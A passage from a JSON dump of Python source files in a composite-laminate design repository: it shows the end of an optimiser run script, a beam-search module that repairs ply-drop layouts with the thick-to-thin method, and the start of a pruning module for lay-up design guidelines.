penalty_bal_switch=penalty_bal_switch)\r\n\r\n#==============================================================================\r\n# Optimiser Run\r\n#==============================================================================\r\nprint('Algorithm running')\r\n\r\n#print(targets)\r\n#print(mat_prop)\r\n#print(constraints)\r\n#print(parameters)\r\n\r\nt = time.time()\r\nresult = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\nelapsed1 = time.time() - t\r\n\r\n#==============================================================================\r\n# Results Display\r\n#==============================================================================\r\nprint()\r\n\r\nprint('\\\\\\\\\\\\\\\\\\\\\\ objective with modified lamination parameters: ',\r\n result.objective)\r\n\r\nprint('\\\\\\\\\\\\\\\\\\\\\\ Elapsed time : ', elapsed1, 's')\r\n\r\nprint('\\nRetrieved stacking sequence')\r\nprint_ss(result.ss)\r\n\r\nprint('Difference of lamination parameters')\r\nprint_lampam(result.lampam - targets.lampam)\r\n\r\nprint('\\nRetrieved lamination parameters')\r\nprint_lampam(result.lampam)\r\n\r\nprint(f'\\nNumber of outer loops performed: {result.number_of_outer_steps_performed}')\r\n\r\nprint('result.n_designs_repaired_unique_tab',\r\n result.n_designs_repaired_unique_tab)"
},
{
"alpha_fraction": 0.5221524834632874,
"alphanum_fraction": 0.5288791060447693,
"avg_line_length": 45.49923324584961,
"blob_id": "5c9334fea25320484dc857966ebeee37083ce6d0",
"content_id": "78b66fb68fe3829b07e336c4132bcceb99caccce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 30922,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 651,
"path": "/src/RELAY/thick_to_thin.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used for the repair of panels with the thick-to-thin methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions of the ply drops necessary to design the thinner panels are\r\n re-optimised with the objective to better match panel lamination\r\n parameter targets while also satisfying design and manufacturing\r\n constraints\r\n\r\n- repair_thick_to_thin\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n with the thick-to-thin methodology\r\n\r\n- calc_panel_weigthings\r\n returns the panel weightings for the objective function at each step of the\r\n thick-to-thin or thin-to-thick repair\r\n\r\n- calc_parameters\r\n caluclates values usefull during the beam search for thick-to-thin or\r\n thin-to-thick repair\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.guidelines.ply_drop_spacing import is_same_pdl\r\nfrom src.guidelines.contiguity import calc_penalty_contig_ss\r\nfrom src.guidelines.disorientation import calc_n_penalty_diso_ss\r\n# from src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.BELLA.objectives import calc_obj_one_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\n# if apply_balance_1_by_1 == True\r\n# - if an angled ply is added/removed from a balance panel, the next ply\r\n# to be removed/added rectify balance\r\n# otherwise\r\n# - all panels of the blending strip are enforced to be balance. This can\r\n# cause issues if the blending strip contains many panels with\r\n# incremental ply counts\r\napply_balance_1_by_1 = True\r\n\r\ndef repair_thick_to_thin(\r\n reduced_lampam, reduced_sst, reduced_ss,\r\n multipanel, parameters, obj_func_param, constraints, mat=0):\r\n \"\"\"\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n with the thick-to-thin methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions of the ply drops necessary to design the thinner panels are\r\n re-optimised with the objective to better match panel lamination\r\n parameter targets while also satisfying design and manufacturing\r\n constraints\r\n \"\"\"\r\n ### initialisation\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n pdl_ref = np.copy(reduced_sst[multipanel.reduced.ind_ref])\r\n n_plies_max = multipanel.reduced.n_plies_in_panels[-1]\r\n# print_list_ss(reduced_sst)\r\n\r\n n_steps = multipanel.reduced.n_steps_thin\r\n ind_panel_tab = multipanel.reduced.ind_panel_thin_tab\r\n new_boundary_tab = multipanel.reduced.new_boundary_thin_tab\r\n# print('n_steps', n_steps)\r\n# print('ind_panel_tab', ind_panel_tab)\r\n# print('new_boundary_tab', new_boundary_tab)\r\n\r\n if n_steps == 0: # no change\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n ## list of ply drop position indices\r\n if constraints.sym:\r\n all_pdl_indices_tab = [[ind for ind, elem in enumerate(reduced_sst[\r\n multipanel.reduced.ind_ref][:n_plies_max // 2]) if elem == -1]]\r\n else:\r\n all_pdl_indices_tab = [[ind for ind, elem in enumerate(reduced_sst[\r\n multipanel.reduced.ind_ref][:n_plies_max]) if elem == -1]]\r\n# print('all_pdl_indices_tab', all_pdl_indices_tab)\r\n last_pdl_index_tab = [None]\r\n\r\n ## ply-drop layouts\r\n initial_pdl = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_pdl[\r\n multipanel.reduced.ind_ref] = reduced_sst[multipanel.reduced.ind_ref]\r\n pdls_tab = [initial_pdl]\r\n# print('initial_pdl', initial_pdl)\r\n\r\n ## lamination parameters\r\n initial_lampam = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_lampam[multipanel.reduced.ind_ref] \\\r\n = reduced_lampam[multipanel.reduced.ind_ref]\r\n lampam_tab = [initial_lampam]\r\n\r\n ## number of plies in each direction\r\n n_plies_per_angle_ref = np.zeros(\r\n (constraints.n_set_of_angles), dtype='float16')\r\n for index in range(ss_ref.size):\r\n index = constraints.ind_angles_dict[ss_ref[index]]\r\n n_plies_per_angle_ref[index] += 1\r\n initial_n_plies_per_angle = [\r\n None for ind in range(multipanel.reduced.n_panels)]\r\n initial_n_plies_per_angle[multipanel.reduced.ind_ref] \\\r\n = np.copy(n_plies_per_angle_ref)\r\n n_plies_per_angle_tab = [initial_n_plies_per_angle]\r\n\r\n ## penalties\r\n initial_pdl_diso = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_pdl_diso[multipanel.reduced.ind_ref] = 0\r\n penalty_diso_tab = [initial_pdl_diso]\r\n\r\n # initial_pdl_contig = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_contig[multipanel.reduced.ind_ref] = 0\r\n # penalty_contig_tab = [initial_pdl_contig]\r\n\r\n # initial_pdl_oopo = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_oopo[multipanel.reduced.ind_ref] = 0\r\n # penalty_oopo_tab = [initial_pdl_oopo]\r\n\r\n # initial_pdl_10 = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_10[multipanel.reduced.ind_ref] = 0\r\n # penalty_10_tab = [initial_pdl_10]\r\n\r\n penalty_spacing_tab = [None]\r\n\r\n angle_queue_tab = [np.array((), dtype=int)]\r\n\r\n ## objectives\r\n obj_no_constraints_tab = [[\r\n None for ind in range(multipanel.reduced.n_panels)]]\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n\r\n n_obj_func_calls = 0\r\n\r\n for ind_step in range(n_steps):\r\n# print('ind_step', ind_step)\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n# print('len(obj_constraints_tab)',\r\n# len(obj_constraints_tab))\r\n\r\n for node in range(len(obj_constraints_tab)):\r\n\r\n ### selection of node to be branched (first in the list)\r\n mother_pdl = pdls_tab.pop(0)\r\n mother_all_pdl_indices = all_pdl_indices_tab.pop(0)\r\n mother_lampam = lampam_tab.pop(0)\r\n mother_n_plies_per_angle = n_plies_per_angle_tab.pop(0)\r\n mother_obj_no_constraints = obj_no_constraints_tab.pop(0)\r\n mother_penalty_diso = penalty_diso_tab.pop(0)\r\n # mother_penalty_contig = penalty_contig_tab.pop(0)\r\n mother_angle_queue = angle_queue_tab.pop(0)\r\n # mother_penalty_oopo = penalty_oopo_tab.pop(0)\r\n # mother_penalty_10 = penalty_10_tab.pop(0)\r\n del penalty_spacing_tab[0]\r\n del last_pdl_index_tab[0]\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n\r\n ### branching + pruning for damage tolerance rule and covering rule\r\n # pd : index of ply deleted from reference stacking sequence\r\n if constraints.covering:\r\n if constraints.n_covering == 1:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(1, n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(1, n_plies_max - 1)\r\n\r\n elif constraints.n_covering == 2:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(2, n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(2, n_plies_max - 2)\r\n else:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(n_plies_max)\r\n\r\n ### remove duplicates\r\n child_pd_indices = np.setdiff1d(child_pd_indices,\r\n mother_all_pdl_indices)\r\n\r\n n_tab_nodes = 0\r\n tab_child_pdl = []\r\n tab_all_pdl_indices = []\r\n tab_penalty_spacing = []\r\n tab_angle_queue = []\r\n tab_last_pdl_index = []\r\n\r\n for one_pd_index in child_pd_indices:\r\n# print('one_pd_index', one_pd_index)\r\n\r\n ### pruning for balance\r\n if constraints.bal:\r\n angle = pdl_ref[one_pd_index]\r\n\r\n if apply_balance_1_by_1:\r\n if mother_angle_queue \\\r\n and angle != -mother_angle_queue[0]:\r\n continue\r\n else:\r\n if mother_angle_queue:\r\n if angle != - mother_angle_queue[0]:\r\n continue\r\n elif (ind_step == n_steps - 1 \\\r\n or new_boundary_tab[ind_step + 1]) \\\r\n and angle not in (0, 90):\r\n continue\r\n\r\n if constraints.bal:\r\n if mother_angle_queue:\r\n tab_angle_queue.append([])\r\n elif angle not in (0, 90):\r\n tab_angle_queue.append([angle])\r\n else:\r\n tab_angle_queue.append([])\r\n else:\r\n tab_angle_queue.append([])\r\n\r\n ### ply drop layout\r\n child_pdl = deepcopy(mother_pdl)\r\n if new_boundary_tab[ind_step]:\r\n child_pdl[ind_panel_tab[ind_step]] = np.copy(\r\n child_pdl[ind_panel_tab[ind_step] + 1])\r\n child_pdl[ind_panel_tab[ind_step]][one_pd_index] = - 1\r\n if constraints.sym:\r\n child_pdl[ind_panel_tab[ind_step]][\r\n n_plies_max - one_pd_index - 1] = - 1\r\n\r\n ### penalties for the ply-drop layout rule\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=child_pdl,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n tab_child_pdl.append(child_pdl[:])\r\n tab_penalty_spacing.append(penalty_spacing)\r\n new_list = list(mother_all_pdl_indices)\r\n new_list.append(one_pd_index)\r\n tab_all_pdl_indices.append(new_list)\r\n tab_last_pdl_index.append(one_pd_index)\r\n\r\n# print('child_pdl', child_pdl)\r\n\r\n ### local pruning for the ply-drop layout rules\r\n indices_to_keep = []\r\n tab_penalty_spacing_for_pruning = np.copy(tab_penalty_spacing)\r\n if len(tab_penalty_spacing_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_penalty_spacing_for_pruning)\r\n indices_to_add = np.where(\r\n tab_penalty_spacing_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n tab_penalty_spacing_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_all_pdl_indices = [tab_all_pdl_indices[index] \\\r\n for index in indices_to_keep]\r\n\r\n ### calculations of lay-up penalties and multi-panel objective\r\n # function values\r\n tab_child_n_plies_per_angle = []\r\n tab_child_lampam = []\r\n # tab_child_penalty_oopo = []\r\n tab_child_penalty_diso = []\r\n # tab_child_penalty_contig = []\r\n tab_child_obj_no_constraints = []\r\n tab_child_obj_constraints = []\r\n # tab_child_penalty_10 = []\r\n\r\n for ind_pd in range(len(tab_child_pdl))[::-1]:\r\n ### calculation of the stacking sequence in the currently\r\n # optimised panel\r\n child_ss = np.copy(tab_child_pdl[\r\n ind_pd][ind_panel_tab[ind_step]])\r\n child_ss = child_ss[child_ss != -1]\r\n# print('child_ss', child_ss.size)\r\n# print_ss(child_ss[:child_ss.size // 2], 30)\r\n\r\n ### calculation of the number of plies in each direction\r\n # ~ child_n_plies_per_angle = np.copy(mother_n_plies_per_angle)\r\n child_n_plies_per_angle = deepcopy(mother_n_plies_per_angle)\r\n if new_boundary_tab[ind_step]:\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]] = np.copy(\r\n child_n_plies_per_angle[ind_panel_tab[ind_step] + 1])\r\n index_pd = tab_last_pdl_index[ind_pd]\r\n my_angle = pdl_ref[index_pd]\r\n index = constraints.ind_angles_dict[my_angle]\r\n\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]][index] -= 1\r\n if constraints.sym and n_plies_max - index_pd - 1 != index_pd:\r\n child_n_plies_per_angle[\r\n ind_panel_tab[ind_step]][index] -= 1\r\n\r\n# print('tab_all_pdl_indices', tab_all_pdl_indices[ind_pd])\r\n# print('index_pd', index_pd, 'my_angle', my_angle)\r\n# print('child_n_plies_per_angle')\r\n# print(child_n_plies_per_angle)\r\n\r\n ### calculation of penalties for the disorientation constraint\r\n if constraints.diso:\r\n penalty_diso = calc_n_penalty_diso_ss(\r\n child_ss, constraints)\r\n else:\r\n penalty_diso = 0\r\n child_penalty_diso = deepcopy(mother_penalty_diso)\r\n child_penalty_diso[ind_panel_tab[ind_step]] = penalty_diso\r\n# print('child_penalty_diso', child_penalty_diso)\r\n\r\n ### calculation of penalties for the contiguity constraint\r\n if constraints.contig:\r\n penalty_contig = calc_penalty_contig_ss(\r\n child_ss, constraints)\r\n # pruning for contiguity\r\n if penalty_contig != 0:\r\n # print('contig')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_all_pdl_indices[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_contig = 0\r\n # child_penalty_contig = deepcopy(mother_penalty_contig)\r\n # child_penalty_contig[ind_panel_tab[ind_step]] = penalty_contig\r\n# print('child_penalty_contig', child_penalty_contig)\r\n\r\n ### calculation of lamination parameters\r\n child_lampam = deepcopy(mother_lampam)\r\n child_lampam[ind_panel_tab[ind_step]] \\\r\n = calc_lampam(child_ss, constraints)\r\n# print('child_lampam', child_lampam)\r\n\r\n ### 10% rule\r\n if constraints.rule_10_percent:\r\n if constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(\r\n child_ss,\r\n constraints,\r\n LPs=child_lampam[ind_panel_tab[ind_step]],\r\n mp=False)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]],\r\n constraints)\r\n # pruning 10% rule\r\n if penalty_10 != 0:\r\n # print('10')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_all_pdl_indices[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_10 = 0\r\n # child_penalty_10 = deepcopy(mother_penalty_10)\r\n # child_penalty_10[ind_panel_tab[ind_step]] = penalty_10\r\n# print('child_penalty_10', child_penalty_10)\r\n\r\n ### calculation of objective function values\r\n obj_no_constraints = calc_obj_one_panel(\r\n lampam=child_lampam[ind_panel_tab[ind_step]],\r\n lampam_target=multipanel.reduced.panels[\r\n ind_panel_tab[ind_step]].lampam_target,\r\n lampam_weightings=multipanel.reduced.panels[\r\n ind_panel_tab[ind_step]].lampam_weightings)\r\n child_obj_no_constraints = deepcopy(mother_obj_no_constraints)\r\n child_obj_no_constraints[\r\n ind_panel_tab[ind_step]] = obj_no_constraints\r\n# print('child_obj_no_constraints', child_obj_no_constraints)\r\n\r\n child_obj_constraints = calc_obj_multi_panel(\r\n objective=child_obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=child_penalty_diso,\r\n penalty_contig=None,\r\n penalty_oopo=None,\r\n penalty_10=None,\r\n penalty_bal_ipo=None,\r\n penalty_weight=None,\r\n with_Nones=True)\r\n# print('child_obj_constraints', child_obj_constraints)\r\n\r\n ### saving\r\n tab_child_n_plies_per_angle.append(child_n_plies_per_angle)\r\n tab_child_lampam.append(child_lampam)\r\n # tab_child_penalty_oopo.append(child_penalty_oopo)\r\n tab_child_penalty_diso.append(child_penalty_diso)\r\n # tab_child_penalty_contig.append(child_penalty_contig)\r\n # tab_child_penalty_10.append(child_penalty_10)\r\n tab_child_obj_no_constraints.append(child_obj_no_constraints)\r\n tab_child_obj_constraints.append(child_obj_constraints)\r\n\r\n n_obj_func_calls += 1\r\n n_tab_nodes += 1\r\n\r\n\r\n ### local pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(tab_child_obj_constraints)\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_all_pdl_indices = [tab_all_pdl_indices[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_child_n_plies_per_angle = [\r\n tab_child_n_plies_per_angle[index] \\\r\n for index in indices_to_keep]\r\n tab_child_lampam = [tab_child_lampam[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_oopo = [tab_child_penalty_oopo[index] \\\r\n # for index in indices_to_keep]\r\n tab_child_penalty_diso = [tab_child_penalty_diso[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_contig = [tab_child_penalty_contig[index] \\\r\n # for index in indices_to_keep]\r\n # tab_child_penalty_10 = [tab_child_penalty_10[index] \\\r\n # for index in indices_to_keep]\r\n tab_child_obj_no_constraints = [\r\n tab_child_obj_no_constraints[index] \\\r\n for index in indices_to_keep]\r\n tab_child_obj_constraints = [\r\n tab_child_obj_constraints[index] \\\r\n for index in indices_to_keep]\r\n\r\n\r\n ### save local solutions as global solutions\r\n for ind in range(len(tab_child_obj_constraints)):\r\n\r\n pdls_tab.append(tab_child_pdl[ind])\r\n all_pdl_indices_tab.append(tab_all_pdl_indices[ind])\r\n last_pdl_index_tab.append(tab_last_pdl_index[ind])\r\n penalty_spacing_tab.append(tab_penalty_spacing[ind])\r\n angle_queue_tab.append(tab_angle_queue[ind])\r\n n_plies_per_angle_tab.append(tab_child_n_plies_per_angle[ind])\r\n lampam_tab.append(tab_child_lampam[ind])\r\n penalty_diso_tab.append(tab_child_penalty_diso[ind])\r\n # penalty_contig_tab.append(tab_child_penalty_contig[ind])\r\n # penalty_oopo_tab.append(tab_child_penalty_oopo[ind])\r\n # penalty_10_tab.append(tab_child_penalty_10[ind])\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, tab_child_obj_constraints[ind]))\r\n obj_no_constraints_tab.append(\r\n tab_child_obj_no_constraints[ind])\r\n\r\n\r\n ### remove duplicates\r\n to_del = []\r\n for ind_pdl_1 in range(len(pdls_tab)):\r\n for ind_pdl_2 in range(ind_pdl_1 + 1, len(pdls_tab)):\r\n if is_same_pdl(pdls_tab[ind_pdl_1],\r\n pdls_tab[ind_pdl_2],\r\n thick_to_thin=True,\r\n ind_ref=multipanel.reduced.ind_ref):\r\n to_del.append(ind_pdl_1)\r\n break\r\n to_del.sort(reverse=True)\r\n for ind_to_del in to_del:\r\n del pdls_tab[ind_to_del]\r\n del all_pdl_indices_tab[ind_to_del]\r\n del last_pdl_index_tab[ind_to_del]\r\n del penalty_spacing_tab[ind_to_del]\r\n del angle_queue_tab[ind_to_del]\r\n del n_plies_per_angle_tab[ind_to_del]\r\n del lampam_tab[ind_to_del]\r\n del penalty_diso_tab[ind_to_del]\r\n # del penalty_contig_tab[ind_to_del]\r\n # del penalty_oopo_tab[ind_to_del]\r\n # del penalty_10_tab[ind_to_del]\r\n del obj_no_constraints_tab[ind_to_del]\r\n obj_constraints_tab = np.delete(obj_constraints_tab,\r\n np.s_[ind_to_del])\r\n\r\n\r\n #### global pruning for ply-drop layout rules\r\n indices_to_keep = []\r\n penalty_spacing_tab_for_pruning = np.copy(penalty_spacing_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(penalty_spacing_tab_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(penalty_spacing_tab_for_pruning)\r\n indices_to_add = np.where(\r\n penalty_spacing_tab_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n penalty_spacing_tab_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n all_pdl_indices_tab = [all_pdl_indices_tab[index] \\\r\n for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_diso_tab = [penalty_diso_tab[index] \\\r\n for index in indices_to_keep]\r\n # penalty_contig_tab = [penalty_contig_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_10_tab = [penalty_10_tab[index] \\\r\n # for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n# print('len(obj_constraints_tab) before global pruning stiffness',\r\n# len(obj_constraints_tab))\r\n\r\n #### global pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(obj_constraints_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n all_pdl_indices_tab = [all_pdl_indices_tab[index] \\\r\n for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_diso_tab = [penalty_diso_tab[index] \\\r\n for index in indices_to_keep]\r\n # penalty_contig_tab = [penalty_contig_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_10_tab = [penalty_10_tab[index] \\\r\n # for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n# print('len(obj_constraints_tab) after global pruning',\r\n# len(obj_constraints_tab))\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n # select best repaired solution\r\n index = np.argmin(obj_constraints_tab)\r\n\r\n for ind_panel in range(multipanel.reduced.ind_ref):\r\n reduced_sst_panel = pdls_tab[index][ind_panel]\r\n reduced_sst[ind_panel] = reduced_sst_panel\r\n reduced_lampam[ind_panel] = lampam_tab[index][ind_panel]\r\n reduced_ss[ind_panel] = reduced_sst_panel[reduced_sst_panel != -1]\r\n\r\n ## check for symmetry\r\n if constraints.sym:\r\n for elem in reduced_ss[0: multipanel.reduced.ind_ref]:\r\n for ind in range(elem.size // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_ss not symmetric')\r\n for elem in reduced_sst[0: multipanel.reduced.ind_ref]:\r\n for ind in range(n_plies_max // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_sst not symmetric')\r\n\r\n ## test for the partial lamination parameters\r\n reduced_lampam_test = calc_lampam(\r\n reduced_ss[0: multipanel.reduced.ind_ref], constraints)\r\n if not abs(reduced_lampam[0: multipanel.reduced.ind_ref] \\\r\n - reduced_lampam_test).all() < 1e-13:\r\n raise Exception(\"\"\"\r\nbeam search does not return group lamination parameters matching\r\nthe group stacking sequences.\"\"\")\r\n\r\n ## test for the ply counts\r\n for ind_panel in range(multipanel.reduced.ind_ref):\r\n if reduced_ss[ind_panel].size \\\r\n != multipanel.reduced.n_plies_in_panels[ind_panel]:\r\n raise Exception(\"\"\"\r\nWrong ply counts in the laminate. This should not happen.\"\"\")\r\n\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n"
},
{
"alpha_fraction": 0.4368756413459778,
"alphanum_fraction": 0.4466930627822876,
"avg_line_length": 42.15209197998047,
"blob_id": "60ddab3bc8a80bb646f4de05e336126c27361232",
"content_id": "f2faa7831ea8371452b6317575f0c00963fd9de8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11612,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 263,
"path": "/src/LAYLA_V02/pruning.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPruning during the beam search\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.external_contig import external_contig\r\nfrom src.guidelines.internal_contig import internal_contig2\r\nfrom src.guidelines.disorientation import is_diso\r\n\r\ndef pruning_diso_contig_damtol(\r\n child_ss,\r\n mother_ss_bot,\r\n ss_bot_simp,\r\n level,\r\n constraints,\r\n targets,\r\n mother_ss_top=None,\r\n ss_top_simp=None):\r\n '''\r\n performs the pruning for disorientation, damage tolerance, contiguity and\r\n middle ply symmetry design guidelines during beam search\r\n\r\n INPUTS\r\n\r\n - level: level of the ply determination in the complete lay-up search tree\r\n - child_ss: possible fibre angles for new level\r\n - ss_bot_simp: partial lay-up before the ply group being optimised\r\n - ss_top_simp: partial lay-up after the ply group being optimised\r\n - mother_ss_bot: beginning of the partial lay-up of the ply group being\r\n optimised\r\n - mother_ss_bot: end of the partial lay-up of the ply group being optimised\r\n - constraints: lay-up design guidelines\r\n - targets.n_plies: laminate target ply counts\r\n '''\r\n# =============================================================================\r\n# pruning for middle ply symmetry\r\n# =============================================================================\r\n if constraints.sym and targets.n_plies % 2 \\\r\n and level == targets.n_plies // 2:\r\n child_ss = np.array([0, 90], int)\r\n# =============================================================================\r\n# pruning for damage tolerance\r\n# =============================================================================\r\n my_set = set([45, -45])\r\n\r\n if constraints.dam_tol:\r\n\r\n if level == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n elif not constraints.sym and level == targets.n_plies - 1:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if constraints.dam_tol_rule in [2, 3]:\r\n\r\n if level == 1:\r\n\r\n if 